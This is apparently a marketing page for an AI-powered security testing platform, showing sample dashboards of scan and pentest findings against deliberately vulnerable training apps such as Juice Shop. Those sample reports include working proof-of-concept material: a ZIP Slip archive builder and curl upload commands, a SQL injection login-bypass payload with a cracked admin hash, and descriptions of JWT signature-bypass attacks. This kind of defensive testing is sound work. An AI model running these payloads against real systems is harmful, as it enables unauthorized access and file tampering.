Built for security engineers who want signal, not noise.
Built by the team behind
.
42k+
Security posture overview
Canonical security findings across your organization
| ID | Title | Repository | Severity | CVSS | EPSS | Source | Status | R |
|---|---|---|---|---|---|---|---|---|
| KG-0E4E07 | ZIP Slip Path Traversal — Arbitrary File Write to Server File... | test/juice-shop | High | — | — | Blackbox Pentest | Open | — |
| KG-090F8A | Sensitive Data in JWT Payload — MD5 Password Hash Exp... | test/juice-shop | High | — | — | Blackbox Pentest | Open | — |
| KG-114331 | IDOR Write Access — Modify or Delete Any User’s Basket I... | test/juice-shop | High | — | — | Blackbox Pentest | Open | — |
| KG-074374 | XML External Entity (XXE) Injection — Arbitrary File Read vi... | test/juice-shop | High | — | — | Blackbox Pentest | Open | — |
| KG-855CAA | Sensitive Data Exposure — Password Hashes and DeluxeTo... | test/juice-shop | Critical | — | — | Blackbox Pentest | Open | — |
| KG-EC0DBE | Sensitive Information Disclosure — Admin Configuration E... | test/juice-shop | Medium | — | — | Blackbox Pentest | Open | — |
| KG-94ADCF | ZIP Path Traversal — Arbitrary File Write to Publicly Served... | test/juice-shop | High | — | — | Blackbox Pentest | Open | — |
| KG-E2C6A5 | IDOR Write/Delete — Unauthorized Modification and Deleti... | test/juice-shop | High | — | — | Blackbox Pentest | Open | — |
| KG-49777C | IDOR — Unauthorized Read Access to Any User’s Shoppin... | test/juice-shop | High | — | — | Blackbox Pentest | Open | — |
| KG-417855 | Broken Access Control — Admin User Data Exposed to Cus... | test/juice-shop | High | — | — | Blackbox Pentest | Open | — |
| KG-9B50D6 | Unauthenticated FTP Directory Exposure — Sensitive Files,... | test/juice-shop | Critical | — | — | Blackbox Pentest | Open | — |
| KG-7823AD | Account Takeover via Publicly Exposed Security Question ... | test/juice-shop | Critical | — | — | Blackbox Pentest | Open | — |
| KG-0F233C | Horizontal Authorization Bypass — Email Vowel-Obfuscati... | test/juice-shop | Medium | — | — | Whitebox Pentest | Open | — |
| KG-9301D0 | Horizontal Authorization Bypass — Email Vowel-Obfuscati... | test/juice-shop | Medium | — | — | Whitebox Pentest | Open | — |
The CI pipeline fetches an installer script from a self-hosted Heroku CDN endpoint and immediately pipes it to sh for execution without any integrity verification.
POST /file-upload (accessed via /#/complain complaint form)UNSPECIFIEDTOKEN=$(python3 -c " import urllib.request, json data = json.dumps({'email': 'recon-fresh@blackbox-dast.local', 'password': 'Recon@Test2024!'})...")'../..' to escape the upload directory. python3 -c " import zipfile, io buf = io.BytesIO() with zipfile.ZipFile(buf, 'w') as zf: zf.writestr('../../ftp/zipslip_confirmed.md', '# ZIP Slip Confirmed\nThis file was written via ZIP Slip path traversal.\nPayload: ../../ftp/zipslip_confirmed.md\n...')curl -s -w "HTTP: %{http_code}\n" \ -X POST 'https://338c-2601-645-8100-7600-5891-afad-f118-9dcc.ngrok-free.app/file-upload' \ -H "Authorization: Bearer $TOKEN" \ -F "file=@/tmp/evil_zipslip.zip;type=application/zip" # Expected: HTTP 204/ftp/ by accessing it directly. curl -s 'https://338c-2601-645-8100-7600-5891-afad-f118-9dcc.ngrok-free.app/ftp/zipslip_confirmed.md' # Expected: HTTP 200 with attacker-controlled contentBB-15: ZIP Slip Path Traversal — Arbitrary File Write to Server Filesystem via /file-upload (High)
OWASP: A01:2025 — Broken Access Control Endpoint: POST /file-upload (accessed via /#/complain complaint form) Auth State: Authenticated customer (recon-fresh@blackbox-dast.local)
The file upload endpoint processes ZIP archives without sanitizing entry paths for directory traversal sequences. An authenticated customer can create a ZIP file containing an entry with a filename such as ../../ftp/attacker.md, which the server extracts to a path outside the intended upload directory. Files written to /ftp/ are immediately publicly accessible via the web. Existing files, including application files, can be overwritten. The upload directory is exactly two levels below /ftp/, making traversal trivial. Escalation to Remote Code Execution is plausible if the traversal depth is sufficient to overwrite Node.js module files or application routes.
Generates an AI-authored fix and opens it as a pull request on the target repo. You review the diff and merge it; this finding auto-resolves once the PR lands.
Auto-patch isn’t available for GitLab repositories yet.
Autonomous penetration testing across your organization
| Target | Status | Exploits | Repositories | Created | Actions |
|---|---|---|---|---|---|
https://keygraph-mdm-test.tunn.dev Black BoxStagingExploit | RunningTesting | — | juice-shop | 33 minutes ago | ⋯ |
https://keygraph-mdm-test.tunn.dev White BoxStagingExploit | Running | 0 exploits | juice-shop | about 2 hours ago | ⋯ |
https://keygraph-mdm-test.tunn.dev Black BoxStagingExploit | Failed | — | — | about 1 hour ago | ⋯ |
https://338c-2601-645-8100-7600... Black BoxStagingExploit | Completed | View Report | juice-shop | 6 days ago | ⋯ |
https://keygraph-mdm-test.tunn.dev Black BoxStagingExploit | Completed | View Report | — | 6 days ago | ⋯ |
https://qf1esqaymz62oydu1k2vxtya... White BoxStagingExploit | Canceled | 0 exploits | juice-shop | 6 days ago | ⋯ |
View detailed results from the autonomous penetration test
$username into the email or username field$password into the password field/
/apiFocus on REST API endpoints/restFocus on user-facing routes/#/score-boardSkip the score board meta-challenge pageThis security assessment of 93ea-2a09-bac5-3b2d-eaa-00-176-3f.ngrok-free.app was conducted on April 23, 2026, targeting the application's REST API surface (/rest/*) with a focus on authentication, authorization, and data handling. The assessment uncovered 66 confirmed vulnerabilities — 20 critical, 25 high, 20 medium, and 1 low — reflecting systemic compromised auth posture, unauthenticated attacker control over user identifiers via SQLi, broken JWT signature verification, and high-impact authorization bypasses across multiple commerce flows. Exploits worked end-to-end in a controlled environment (autonomous orchestrator + LLM-powered analysis) and a complete remediation roadmap is included alongside reproductible PoCs.
| ID | Vulnerability | Endpoint | Severity |
|---|---|---|---|
| INJ-VULN-01 | SQL Injection Authentication Bypass | POST /rest/user/login | CRITICAL |
| INJ-VULN-02 | SQL Injection UNION-Based Data Extraction | GET /rest/products/search | CRITICAL |
| AUTH-VULN-07 | JWT Algorithm None (alg:none) Authentication Bypass | ALL isAuthorized()-protected endpoints | CRITICAL |
| AUTH-VULN-10 | Default Admin Credentials | POST /rest/user/login | CRITICAL |
| AUTH-VULN-14 | Mass Assignment Privilege Escalation (Admin Role Registration) | POST /api/Users | CRITICAL |
| AUTH-VULN-18 | SQL Injection Authentication Bypass | POST /rest/user/login | CRITICAL |
| XSS-VULN-04 | Reflected XSS via Track-Order Parameter | GET /#/track-result | HIGH |
| XSS-VULN-06 | JSONP Callback Injection · Cross-Domain Data Theft | GET /rest/user/whoami | HIGH |
{
"id": "INJ-VULN-01",
"endpoint": "POST /rest/user/login",
"payload": "' OR '1'='1'--",
"response_code": 200,
"response_signature": "george@keygraph.com (id=1, role=admin)",
"reproduced": true
}
Detailed vulnerability analysis and reproduction information
Send POST /rest/user/login with tautology payload in email field
The injected SQL becomes: SELECT * FROM Users WHERE email = '' OR '1'='1'--' AND password = '...'
The -- comments out the password check; SQLite returns the first row (admin, id=1)
Observe HTTP 200 response containing admin JWT token
HTTP 200 returned with admin JWT token (email: george@keygraph.com, role: admin, id: 1). MD5 hash 0192023a7bbd73250516f069df18b500 = admin123 confirmed via rainbow table.
View detailed results from the autonomous penetration test
Scan Docker images for vulnerabilities, secrets, and misconfigurations
| Image & Context | Triggered | Progress | Findings |
|---|---|---|---|
local-dev-kg/vuln-bankmultiarch-amd64only | 30 days agoManual | Complete | 3 Critical27 High |
local-dev-kg/vuln-bankbuilt-on-x86 | about 2 months agoManual | Complete | 3 Critical18 High |
local-dev-kg/dvwaamd64-intel-mac | about 2 months agoManual | Complete | 254 Critical552 High |
local-dev-kg/vuln-bankmultiarch-amd64only | about 2 months agoManual | Complete | 3 Critical18 High |
local-dev-kg/testingtest-empty-image | about 2 months agoManual | Complete | 0 |
local-dev-kg/fineractlatest | about 2 months agoManual | Complete | 1 High1 Medium |
local-dev-kg/vuln-banklatest | about 2 months agoManual | Complete | 3 Critical18 High |
local-dev-kg/testingtest-clean-minimal | about 2 months agoManual | Complete | 0 |
local-dev/dvwa amd64-intel-mac
This container has CRITICAL risk with 3 critical and 27 high severity vulnerabilities, including CVE-2025-15407 (CVSS 9.6) affecting OpenSSL, with remote code execution potential. 91 of 225 findings are fixable, with 77% originating from the base image, indicating systemic base image vulnerabilities. The Debian 13.7 (Trixie) base image contains multiple critical OpenSSL and glibc vulnerabilities that pose immediate security risks. Switch to gcr.io/distroless/python3-debian13 to eliminate OS package vulnerabilities while maintaining Python runtime support.
| Layer | Origin | Dockerfile Instruction | Pkgs | C | H | M | L | Total |
|---|---|---|---|---|---|---|---|---|
| 0 | base | # debian.13-slim 'sloth' 6c1798533009 | 32 | 1 | 4 | 16 | 5 | 147 |
| 1 | base | RUN set -eux; apt-get update; apt-get install -y --no-install-rec... | 1 | 1 | 1 | 4 | 1 | 7 |
| 2 | base | RUN set -eux; saveAptMark="$(apt-mark showmanual)"; apt-get upd... | 4 | 1 | 4 | 4 | 0 | 18 |
| 3 | application | RUN apt-get update && apt-get install -y postgresql-client | 6 | 0 | 4 | 8 | 0 | 28 |
| 4 | application | RUN apt-get update && apt-get install -y postgresql-client | 10 | 0 | 0 | 0 | 0 | 10 |
| 5 | application | RUN pip install --no-cache-dir -r requirements.txt | 5 | 0 | 0 | 0 | 0 | 20 |
| misconfig | Dockerfile best-practice violations | — | — | — | 2 | — | 2 | |
| Severity | Type | ID | Title | Package | CVSS |
|---|---|---|---|---|---|
| Critical | CVE-2013-15903 | httpd: read-after-free in h2 connection shutdown | apache2 2.4.25-3+deb8u3 | 9.1 | |
| Critical | CVE-2013-15891 | mod_session: Heap overflow due to a crafted SessionHeader d... | apache2 2.4.25-3+deb8u3 | 9.1 | |
| Critical | CVE-2013-37875 | mod_proxy: SSRF via a crafted URI in mod_proxy_http... | apache2 2.4.25-3+deb8u3 | 9.0 | |
| Critical | CVE-2013-46499 | httpd: Out-of-bounds write in ap_escape_quotes() via malicious i... | apache2 2.4.25-3+deb8u3 | 8.9 | |
| Critical | CVE-2022-26377 | httpd: mod_lua: Possible buffer overflow when parsing multipart c... | apache2 2.4.25-3+deb8u3 | 8.7 | |
| Critical | CVE-2022-22719 | httpd: Errors encountered in the discarding of request body to t... | apache2 2.4.25-3+deb8u3 | 8.6 | |
| Critical | CVE-2022-31813 | httpd: mod_proxy: X-Forwarded-* headers stripping breaks IP-bas... | apache2 2.4.25-3+deb8u3 | 8.5 | |
| Critical | CVE-2022-28615 | httpd: mod_lua: Possible NULL-pointer dereference reads beyon... | apache2 2.4.25-3+deb8u3 | 8.5 | |
| Critical | CVE-2022-30556 | httpd: mod_lua: Buffer overflow when parsing multipart request c... | apache2 2.4.25-3+deb8u3 | 8.4 | |
| Critical | CVE-2022-29404 | httpd: mod_lua: DoS in r:parsebody | apache2 2.4.25-3+deb8u3 | 8.3 | |
| Critical | CVE-2021-44790 | httpd: mod_lua: Possible buffer overflow when parsing multipart c... | apache2 2.4.25-3+deb8u3 | 8.2 | |
| Critical | CVE-2021-39275 | httpd: ap_escape_quotes() out-of-bounds write | apache2 2.4.25-3+deb8u3 | 8.1 |
Every action recorded with actor, timestamp, and source
| Time | Event Type | Subject | Actor |
|---|---|---|---|
| Apr 27, 2026 08:02:38 | appsec:SubmitBoundarySelection | juice-shop | george@keygraph.com |
| Apr 27, 2026 07:50:57 | appsec:TriggerBoundaryAnalysis | juice-shop | george@keygraph.com |
| Apr 27, 2026 07:50:29 | appsec:TriggerManualScan | juice-shop | george@keygraph.com |
| Apr 27, 2026 07:21:01 | appsec:TriggerManualScan | vuln-bank | george@keygraph.com |
| Apr 27, 2026 06:39:51 | appsec:TriggerManualScan | juice-shop | george@keygraph.com |
| Apr 27, 2026 05:54:14 | appsec:TriggerManualScan | dvwa | george@keygraph.com |
| Apr 27, 2026 05:53:42 | appsec:TriggerManualScan | juice-shop | george@keygraph.com |
Manage users and invitations for your organization
| Name | Status | Role | Account Type | Link Status | Actions | |
|---|---|---|---|---|---|---|
| George Flores | george@keygraph.com | Active | Member | User | Primary | ⋯ |
| Repository | Default Branch | Group | Last Scanned | ||
|---|---|---|---|---|---|
| local-dev-kg/juice-shop | master | Unassigned | about 8 hours ago | ⋯ | |
| test/juice-shop-appsec | master | Unassigned | about 8 hours ago | ⋯ | |
| local-dev-kg/AWSGoat | master | Unassigned | about 1 month ago | ⋯ | |
| local-dev-kg/WebGoat | main | Unassigned | 3 days ago | ⋯ | |
| local-dev-kg/DVWA | master | Unassigned | 9 days ago | ⋯ | |
| local-dev-kg/dvws-node | master | Unassigned | Never scanned | ⋯ | |
| local-dev-kg/NodeGoat | master | Unassigned | 11 days ago | ⋯ | |
| local-dev-kg/railsgoat | master | Unassigned | 14 days ago | ⋯ | |
| local-dev-kg/pygoat | main | Unassigned | 13 days ago | ⋯ | |
| local-dev-kg/crAPI | develop | Unassigned | about 1 month ago | ⋯ | |
| local-dev-kg/VAmPI | master | Unassigned | Never scanned | ⋯ | |
| local-dev-kg/wrongsecrets | master | Unassigned | 25 days ago | ⋯ | |
| local-dev-kg/dvga | master | Unassigned | Never scanned | ⋯ | |
| local-dev-kg/bWAPP | master | Unassigned | Never scanned | ⋯ | |
| local-dev-kg/mutillidae | master | Unassigned | Never scanned | ⋯ |
Scans across all scan types
| Type | Target | Status | Findings | Triggered |
|---|---|---|---|---|
| SAST | local-dev-kg/juice-shopmaster · 19a3054c | Complete | 4 Critical28 High | 12 days agoManualComprehensive |
| SCA | local-dev-kg/juice-shopmaster · 19a3054c | Complete | 18 Critical28 High | 12 days agoManualComprehensive |
| IaC | local-dev-kg/k8s-terraform-ansible-samplemaster · 1a69bf99 | Complete | 4 Critical10 High | 12 days agoManualComprehensive |
| SAST | local-dev-kg/bc-kotlinmain · 27f05751 | Complete | 4 High | 12 days agoManualComprehensive |
| SCA | local-dev-kg/cxfmain · 5a501cd8 | Complete | 6 Critical16 High | 12 days agoManualFast |
Static Application Security Testing scan runs
| Repository & Context | Status | Findings | Triggered | Language |
|---|---|---|---|---|
local-dev-kg/bc-kotlinmain · 27f05751 | Complete | 4 High | 12 days agoManualComprehensive | Kotlin |
local-dev-kg/bc-csharpmaster · 5200dfdf | Complete | 27 High10 Medium | 12 days agoManualComprehensive | C# |
local-dev-kg/juice-shopmaster · 19a3054c | Complete | 4 Critical28 High | 12 days agoManualComprehensive | JS |
local-dev-kg/pipline-test-repomain · 8524e5fb | Complete | 9 Critical10 High | 18 days agoManualComprehensive | JS |
local-dev-kg/driftmain · f329b1ab | Complete | 1 Critical4 High | 18 days agoManualComprehensive | Ruby |
local-dev-kg/pipline-test-repomain · 8524e5fb | Complete | 10 Critical9 High | 18 days agoManualComprehensive | JS |
local-dev-kg/driftmain · f329b1ab | Complete | 1 Critical2 High | 18 days agoManualComprehensive | Ruby |
local-dev-kg/driftmain · f329b1ab | Complete | 1 Critical2 High | 18 days agoManualComprehensive | Ruby |
Software Composition Analysis scan runs
| Repository & Context | Status | Findings | Triggered |
|---|---|---|---|
local-dev-kg/bc-kotlinmain · 27f05751 | Complete | 1 Medium | 12 days agoManualComprehensive |
local-dev-kg/bc-csharpmaster · 5200dfdf | Complete | 3 Medium | 12 days agoManualComprehensive |
local-dev-kg/cxfmain · 5a501cd8 | Complete | 6 Critical16 High | 12 days agoManualFast |
test/vectormaster · 47b5b02b | Complete | 5 Critical11 High | 12 days agoManualComprehensive |
test/grafanamain · a4dbaa56 | Complete | 1 Critical8 High | 12 days agoManualFast |
test/vuln-bankmain · 9b22a832 | Complete | 6 High14 Medium | 12 days agoManualComprehensive |
local-dev-kg/juice-shopmaster · 19a3054c | Complete | 18 Critical28 High | 12 days agoManualComprehensive |
local-dev-kg/driftmain · f329b1ab | Complete | 2 Critical7 High | 18 days agoManualComprehensive |
Infrastructure as Code scan runs
| Repository & Context | Status | Findings | Triggered |
|---|---|---|---|
local-dev-kg/k8s-terraform-ansible-samplemaster · 1a69bf99 | Complete | 4 Critical10 High | 12 days agoManualComprehensive |
local-dev-kg/AWSGoatmaster · b24869ad | Complete | 2 Critical6 High | 12 days agoManualComprehensive |
local-dev-kg/juice-shopmaster · 19a3054c | Complete | 3 High5 Medium | 12 days agoManualComprehensive |
local-dev-kg/AWSGoatmaster · b24869ad | Complete | 7 High1 Medium | 14 days agoManualComprehensive |
local-dev-kg/juice-shopmaster · 19a3054c | Complete | 7 High1 Low | 19 days agoManualComprehensive |
test/juice-shop-appsecmaster · 05e0be7b | Complete | 10 High13 Medium | 22 days agoManualFast |
local-dev-kg/juice-shopmaster · 19a3054c | Complete | 7 High1 Medium | 22 days agoManualComprehensive |
local-dev-kg/juice-shopmaster · 19a3054c | Complete | 11 High10 Medium | 22 days agoManualFast |
| Finding | Data Flow | Boundaries | Teams | Severity |
|---|---|---|---|---|
CWE-643: XPath Operator Injection via JSON-parsed URL parameter in Sequelize WHERE clause | recycles.ts:34 (col 21) | juice-shop | engineering | HIGH |
CWE-89: SQL Injection via unverified email field in login query | login.ts:34 → login.ts:55 | juice-shop | engineering | HIGH |
CWE-209: XSS via unverified URL controlled URL in profile-image fetch | profileImageUrlUpload.ts:13 → profileImageUrlUpload.ts:16 | juice-shop | engineering | HIGH |
CWE-943: NoSQL Injection via unverified request body ID in MongoDB query | b2bOrder.ts:30 → b2bOrder.ts:35 | juice-shop | engineering | HIGH |
CWE-943: NoSQL Injection via unverified request body ID in MongoDB query | b2bOrder.ts:30 → b2bOrder.ts:39 | juice-shop | engineering | HIGH |
CWE-943: NoSQL Injection via unverified request body in MongoDB query filter | b2bOrder.ts:30 → b2bOrder.ts:42 | juice-shop | engineering | HIGH |
CWE-22: Path Traversal via unverified request body file in fileRead | verifyFiles.ts:9 → verifyFiles.ts:24 | juice-shop | engineering | HIGH |
CWE-502: Unsafe deserialization via user-controlled file path in fs.read | payment.component.ts:11 → payment.component.ts:18 | juice-shop | engineering | HIGH |
CWE-89: SQL Injection via unverified search parameter in raw Sequelize query | search.ts:13 → search.ts:18 | juice-shop | engineering | HIGH |
| Finding | Location | Boundaries | Teams | Severity |
|---|---|---|---|---|
CWE-347: JWT Token Decoded Without Signature Verification | app.guard.ts:18 | juice-shop | engineering | CRITICAL |
CWE-310: SQL Injection in Authentication Query Leading to Cleartext Password Transmission | login/loginUserChallenge_4.ts:15 | juice-shop | engineering | CRITICAL |
CWE-548: Directory Listing Exposure - (well-known Directory) | directoryListing/dirIndex_4.ts:0 | juice-shop | engineering | HIGH |
CWE-1004: Insufficient Random Password Generation Using Base64 Encoding of Reversed Email | auth/component_2.ts:18 | juice-shop | engineering | HIGH |
CWE-328: Use of Weak Hash Function (Base64) for Password Generation | auth/component_3.ts:18 | juice-shop | engineering | HIGH |
CWE-614: Authentication Token Cookie Missing Secure Flag | payment.component.ts:11 | juice-shop | engineering | HIGH |
CWE-614: Authentication Token Cookie Missing Secure Flag | two-factor-auth-enter.component.ts:14 | juice-shop | engineering | HIGH |
CWE-327: Weak HMAC Secret Key - Hardcoded For 2FA Authentication | 2fa/totp_5.ts:5 | juice-shop | engineering | HIGH |
CWE-326: Hardcoded RSA Private Key in Source Code | cryptUtils.ts:14 | juice-shop | engineering | HIGH |
CWE-693: Predictable RSA Private Key for Security Sensitive Data | cryptUtils.ts:18 | juice-shop | engineering | HIGH |
CWE-565: Missing CSRF Protection on State-Changing Endpoint Verdict Acknowledgment | checkVerdict.ts:25 | juice-shop | engineering | HIGH |
CWE-213: excessive-data-exposure in routes/authenticatedUsers.ts:25 | authenticatedUsers.ts:25:0 | juice-shop | engineering | HIGH |
CWE-20: missing-input-validation in routes/b2bOrder.ts:19 | b2bOrder.ts:19:0 | juice-shop | engineering | HIGH |
CWE-770: missing-rate-limit in routes/search.ts:23 | search.ts:23:0 | juice-shop | engineering | HIGH |
CWE-770: missing-rate-limit in routes/b2bOrder.ts:17 | b2bOrder.ts:17:0 | juice-shop | engineering | HIGH |
CWE-770: missing-rate-limit in routes/chatbot.ts:205 | chatbot.ts:205:0 | juice-shop | engineering | HIGH |
CWE-770: missing-rate-limit in routes/dataExports.ts:16 | dataExports.ts:16:0 | juice-shop | engineering | HIGH |
CWE-770: missing-rate-limit in routes/search.ts:23 | search.ts:23:0 | juice-shop | engineering | HIGH |
CWE-639: bola in routes/basket.ts:0 | basket.ts:0 | juice-shop | engineering | HIGH |
CWE-915: mass-assignment in server.ts:0 | server.ts:0 | juice-shop | engineering | HIGH |
CWE-269: privesc in server.ts:0 | server.ts:0 | juice-shop | engineering | HIGH |
| Finding | Data Flow | Boundaries | Teams | Severity |
|---|---|---|---|---|
CWE-287: Authentication Bypass in changeProduct | server.ts:0 → server.ts:0 | juice-shop | engineering | CRITICAL |
CWE-287: Authentication Bypass in changePassword | changePassword.ts:0 → changePassword.ts:0 | juice-shop | engineering | HIGH |
CWE-287: Authentication Bypass in updateProductReview | updateProductReviews.ts:0 → updateProductReviews.ts:0 | juice-shop | engineering | HIGH |
CWE-285: Authorization Bypass in orderHistory | orderHistory.ts:0 → orderHistory.ts:0 | juice-shop | engineering | HIGH |
CWE-287: Authentication Bypass in collectorWebReader | recyclewebreader.ts:0 → recyclewebreader.ts:0 | juice-shop | engineering | HIGH |
CWE-287: Authentication Bypass in serviceFlow | services.ts:0 → services.ts:0 | juice-shop | engineering | HIGH |
CWE-287: Authentication Bypass in deliveryService | deliveryMethod.ts:0 → deliveryMethod.ts:0 | juice-shop | engineering | HIGH |
CWE-639: Insecure Direct Object Reference in trackOrder | trackOrder.ts:0 → trackOrder.ts:0 | juice-shop | engineering | HIGH |
CWE-639: Insecure Direct Object Reference in couponCheck | couponcheck.ts:0 → couponcheck.ts:0 | juice-shop | engineering | HIGH |
CWE-287: Authentication Bypass in forgotFeedback challenge | feedbackChallenge.ts:0 → feedbackChallenge.ts:0 | juice-shop | engineering | HIGH |
CWE-287: Authentication Bypass in N/A (finds auto-generated) | N/A:0 → N/A:0 | juice-shop | engineering | HIGH |
| Package | Reachability | Dependency | Recommendation | Boundaries | Teams |
|---|---|---|---|---|---|
marsdb@0.6.11 npm | Reachable (1 of 2) | Direct | , | juice-shop | engineering |
jsonwebtoken@0.4.0 npm | Reachable (2 of 4) | Direct | cd appsec/scans/appsec-ba… | juice-shop | engineering |
vm2@3.9.17 npm | Reachable (1 of 5) | Transitive | cd appsec/scans/appsec-ba… | , | , |
express-jwt@0.1.3 npm | Reachable | Direct | cd appsec/scans/appsec-ba… | juice-shop | engineering |
sanitize-html@1.4.2 npm | Reachable (2 of 7) | Direct | cd appsec/scans/appsec-ba… | juice-shop | engineering |
Update jsonwebtoken from version 0.4.0 to version 4.2.2 or later.
cd appsec/scans/appsec-baseline-scans/8eed4fb4-4809-40b8-9769-f662decd9741/repo && npm install jsonwebtoken@4.2.2
jsonwebtoken@0.4.0 does not validate the JWT algorithm during jwt.verify(), enabling both the alg:none bypass and an RS256→HS256 algorithm confusion attack. The codebase calls jwt.verify(token, publicKey, callback) without an algorithms allowlist in three production files.
jsonwebtoken@0.4.0 is called via jwt.verify() in three production routes without restricting the allowed algorithm. An attacker can craft a forged JWT signed with HS256 using the RSA public key as the HMAC secret, which the library will accept as valid, completely bypassing authentication.
Versions ≤8.5.1 of jsonwebtoken library could be misconfigured so that legacy, insecure key types are used for signature verification.
In versions ≤8.5.1 of jsonwebtoken library, lack of algorithm definition and a falsy secret or key in the jwt.verify() call could lead to signature validation bypass.
| Description | Location | CWE | Severity |
|---|---|---|---|
Hardcoded OAuth 2.0 Access Token Exposure in URL Parameter | frontend/src/app/Services/user.service.ts:60 | CWE-798 | HIGH |
Hardcoded Ethereum Mnemonic Phrase in Source Code | routes/checkKeys.ts:7 | CWE-798 | HIGH |
Hardcoded Alchemy API Key in WebSocket Provider | routes/nftMint.ts:9 | CWE-798 | HIGH |
Hardcoded Alchemy API Key in Production Code | routes/web3Wallet.ts:9 | CWE-798 | HIGH |
| Finding | Data Flow | Boundaries | Teams | Severity |
|---|---|---|---|---|
CWE-250: root-container in test/smoke/Dockerfile:1 | Dockerfile:1:0 | juice-shop | engineering | HIGH |
CWE-829: unpinned-image in docker-compose.test.yml:7 | docker-compose.test.yml:7:0 | juice-shop | engineering | HIGH |
CWE-829: unpinned-image in Dockerfile:22 | Dockerfile:22:0 | juice-shop | engineering | HIGH |
CWE-829: unpinned-image in test/smoke/Dockerfile:1 | Dockerfile:1:0 | juice-shop | engineering | HIGH |
CWE-494: pipe-to-shell in .github/workflows/ci.yml:326 | ci.yml:326:0 | juice-shop | engineering | HIGH |
CWE-829: untrusted-source in .github/workflows/ci.yml:161 | ci.yml:161:0 | juice-shop | engineering | HIGH |
CWE-494: unverified-image in docker-compose.test.yml:7 | docker-compose.test.yml:7:0 | juice-shop | engineering | HIGH |
CWE-494: unverified-image in test/smoke/Dockerfile:1 | Dockerfile:1:0 | juice-shop | engineering | HIGH |
CWE-494: unverified-image in Dockerfile:22 | Dockerfile:22:0 | juice-shop | engineering | HIGH |
CWE-494: unverified-image in Dockerfile:1 | Dockerfile:1:0 | juice-shop | engineering | HIGH |
CWE-829: unpinned-image in Dockerfile:1 | Dockerfile:1:0 | juice-shop | engineering | MEDIUM |
CWE-829: unpinned-module in .github/workflows/codeql-analysis.yml:33 | codeql-analysis.yml:33:0 | juice-shop | engineering | MEDIUM |
Define how many days your team has to remediate vulnerabilities after detection. SLA deadlines appear on each finding and drive the compliance chart on your dashboard.
Repositories, container images, and pentest profiles your org is monitoring
| Profile | Env | Target URL | Repos | Scans | Last Scanned | ||
|---|---|---|---|---|---|---|---|
| tmp 2 juice shop | Staging | https://keygraph-mdm-test.tunn.dev | 1 | 6 | 1 day ago | Scan | ⋯ |
| tmp juice shop | Staging | https://338c-2601-645-8100-7600-5... | 1 | 4 | 6 days ago | Scan | ⋯ |
| Juice Shop | Staging | https://qf1esqaymz62oydu1k2vxtyat... | 1 | 8 | 6 days ago | Scan | ⋯ |
| Test | Staging | https://qf1esqaymz62oydu1k2vxtyat... | 1 | 3 | 11 days ago | Scan | ⋯ |
Repositories, container images, and pentest profiles your org is monitoring
| Repository | Default Branch | Group | Boundaries | Last Scanned | |||
|---|---|---|---|---|---|---|---|
| local-dev-kg/AWSGoat | master | Unassigned | None | 12 days ago | Scan | ⋯ | |
| local-dev-kg/bc-csharp | master | Unassigned | None | 12 days ago | Scan | ⋯ | |
| local-dev-kg/bc-java | main | Unassigned | None | about 2 months ago | Scan | ⋯ | |
| local-dev-kg/bc-kotlin | main | Unassigned | None | 12 days ago | Scan | ⋯ | |
| local-dev-kg/boundaries-ex | main | Unassigned | 7 boundaries | about 1 month ago | Scan | ⋯ | |
| local-dev-kg/cxf | main | Unassigned | None | 12 days ago | Scan | ⋯ | |
| test/documenso | main | Unassigned | None | Never scanned | Scan | ⋯ | |
| local-dev-kg/drift | main | Unassigned | None | 18 days ago | Scan | ⋯ | |
| local-dev-kg/dvws-node | master | Unassigned | None | Never scanned | Scan | ⋯ | |
| test/elasticsearch | main | Unassigned | None | Never scanned | Scan | ⋯ | |
| local-dev-kg/elasticsearch-test | main | Unassigned | None | Never scanned | Scan | ⋯ |
Repositories, container images, and pentest profiles your org is monitoring
| Image Repository | Registry | Auto-Scan | Last Scanned | ||
|---|---|---|---|---|---|
| local-dev-kg/dvwa | local-dev-kg’s Docker Hub Docker Hub | Disabled | Never scanned | Scan | ⋯ |
| local-dev-kg/vuln-bank | local-dev-kg’s Docker Hub Docker Hub | Disabled | Never scanned | Scan | ⋯ |
public · PHP · master
Your team ships code daily but your pentest only happens once a year. Keygraph closes the 364-day gap with on-demand, automated penetration testing on every build.
Continuous application security across every layer of your stack, from static analysis of your code to runtime pentesting of your apps.
Full code-aware pentesting. Agents read your source, understand architecture, and generate precise exploits validated against the live app.
Learn about Whitebox Pentester →Code Property Graph plus LLM reasoning. Flags real vulnerabilities with full data-flow context, not regex matches.
Learn about Agentic SAST →Autonomous pentesting against the running app with zero code access. On-demand, per repository, no subscription required.
Learn about Blackbox Pentester →Authorization bypass, IDOR, state-machine flaws, race conditions, and workflow abuse. The vulnerabilities pattern-matchers miss.
Learn about Business Logic →Terraform, CloudFormation, Kubernetes manifests, and Helm charts, scanned for misconfigurations, insecure defaults, and policy violations.
Learn about IaC Scanning →Software composition analysis with reachability. Know which CVEs in your dependencies actually matter, reachable from attacker-controlled input.
Learn about SCA →Find leaked credentials, tokens, and API keys across code and commit history. Validated, deduplicated, and prioritized by blast radius.
Learn about Secrets Scanning →Scan container images for vulnerable packages, exposed secrets, and misconfigurations across every layer. Catch issues before they ship to your registry.
Learn about Container Scanning →Deploys entirely inside your AWS, GCP, or Azure account. Source, scan results, and AI inference stay inside your security perimeter. No managed control plane. No externally operated data plane.
See the Enterprise platform →Keygraph deduplicates SAST, SCA, Secrets, IaC, Container, and Whitebox results into a single canonical entry per vulnerability per repository, surfaced on a live security dashboard and synced bidirectionally with Jira.
Explore Reporting & Analytics →Click a confirmed finding in Keygraph. An agent reads the evidence, writes the fix, and re-runs the original scanner to prove the vulnerability is gone. The verified patch is yours to review and apply through your normal workflow.
Explore Code Remediation →Source loads into ephemeral worker memory and is discarded when the scan completes. Nothing written to disk.
Zero-retention enforced upstream with every model vendor. No prompts, completions, or embeddings feed training pipelines.
Route inference through your own Anthropic, OpenAI, Bedrock, or self-hosted endpoint. Tokens never traverse Keygraph.
Every scan runs on read-only scopes. The only feature that ever requests write access is code remediation — opt-in per finding, delivered as a verified patch your developers review and apply, never pushed straight to your branches.
Deploy the entire platform inside your VPC. Air-gapped, isolated, and audited end-to-end on your infrastructure.
After a scan, source is gone. Only the canonical finding record persists: rule, path, line, severity, status, and a redacted snippet.
GLBASafeguards Rule
NYDFSPart 500
DORATLPT
CMMCLevel 3